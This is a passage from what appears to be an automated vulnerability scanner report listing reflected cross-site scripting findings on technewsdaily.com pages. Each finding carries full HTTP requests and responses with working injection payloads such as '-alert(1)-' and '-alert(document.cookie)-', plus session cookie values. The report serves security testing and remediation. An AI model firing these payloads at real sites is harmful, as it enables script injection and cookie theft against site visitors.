<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... xt/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/?6ba2f'-alert(1)-'7cf0f87ab98=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.105. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ded2"><a>15af9eca811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /lasers-could-defend-helicopters-against-missiles--1172/?6ded2"><a>15af9eca811=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64508
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/?6ded2"><a>15af9eca811=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2c8a'-alert(1)-'6918a49ee69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477a2c8a'-alert(1)-'6918a49ee69/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40546
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477a2c8a'-alert(1)-'6918a49ee69/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.107. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae776'-alert(1)-'851478bcf65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?ae776'-alert(1)-'851478bcf65=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?ae776'-alert(1)-'851478bcf65=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.108. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e49b"><a>2e0ba5ecb34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?9e49b"><a>2e0ba5ecb34=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66196
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?9e49b"><a>2e0ba5ecb34=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af259'-alert(1)-'c11899a277c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /led-lights-illuminate-medical-field-1456af259'-alert(1)-'c11899a277c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40478
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456af259'-alert(1)-'c11899a277c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.110. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/led-lights-illuminate-medical-field-1456/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f8"><a>fa959b89ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /led-lights-illuminate-medical-field-1456/?d18f8"><a>fa959b89ea4=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63826
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/?d18f8"><a>fa959b89ea4=1/" /> ...[SNIP]...
1.111. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/led-lights-illuminate-medical-field-1456/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13df7'-alert(1)-'9a13574e422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /led-lights-illuminate-medical-field-1456/?13df7'-alert(1)-'9a13574e422=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63464
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... cript type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/?13df7'-alert(1)-'9a13574e422=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6007'-alert(1)-'c8fabfde0e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-app-store-launch-date-announced-1749c6007'-alert(1)-'c8fabfde0e1/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40478
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749c6007'-alert(1)-'c8fabfde0e1/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.113. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/mac-app-store-launch-date-announced-1749/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8b9a"><a>1ad26e2a2af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-app-store-launch-date-announced-1749/?b8b9a"><a>1ad26e2a2af=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/?b8b9a"><a>1ad26e2a2af=1/" /> ...[SNIP]...
1.114. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/mac-app-store-launch-date-announced-1749/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee6a7'-alert(1)-'5f6a6f34f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-app-store-launch-date-announced-1749/?ee6a7'-alert(1)-'5f6a6f34f2f=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:11 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... cript type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/?ee6a7'-alert(1)-'5f6a6f34f2f=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7c60'-alert(1)-'59b579bce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /malware-will-change-the-face-of-warfare-1321f7c60'-alert(1)-'59b579bce/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40482
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ipt type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/malware-will-change-the-face-of-warfare-1321f7c60'-alert(1)-'59b579bce/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de0bc'-alert(1)-'6e0760504f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/system/js/de0bc'-alert(1)-'6e0760504f8 HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:50:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/media/system/js/de0bc'-alert(1)-'6e0760504f8",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ffe8'-alert(1)-'3bed600e059 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/system/js/1ffe8'-alert(1)-'3bed600e059 HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:50:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:50:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
